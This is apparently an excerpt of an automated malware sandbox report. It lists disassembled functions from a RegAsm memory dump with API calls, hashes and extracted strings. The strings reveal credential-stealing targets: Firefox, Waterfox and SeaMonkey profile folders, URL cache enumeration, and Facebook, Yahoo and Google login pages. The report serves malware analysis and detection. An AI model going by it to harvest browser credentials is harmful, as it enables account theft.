                                                                                                                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                • String ID: r!A
                                                                                                                                                                                • API String ID: 2791114272-628097481
                                                                                                                                                                                • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                • API String ID: 2936932814-4196376884
                                                                                                                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                • API String ID: 4039892925-11920434
                                                                                                                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                • API String ID: 4039892925-2068335096
                                                                                                                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                • API String ID: 4039892925-3369679110
                                                                                                                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                • API String ID: 3510742995-2641926074
                                                                                                                                                                                • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                • free.MSVCRT ref: 0041848B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateErrorFileLastfree
                                                                                                                                                                                • String ID: |A
                                                                                                                                                                                • API String ID: 981974120-1717621600
                                                                                                                                                                                • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                • String ID: $0.@
                                                                                                                                                                                • API String ID: 2758756878-1896041820
                                                                                                                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                • API String ID: 1534475566-1174173950
                                                                                                                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 669240632-0
                                                                                                                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                • API String ID: 2925649097-2036018995
                                                                                                                                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                • String ID: "%s"
                                                                                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2911713577-0
                                                                                                                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
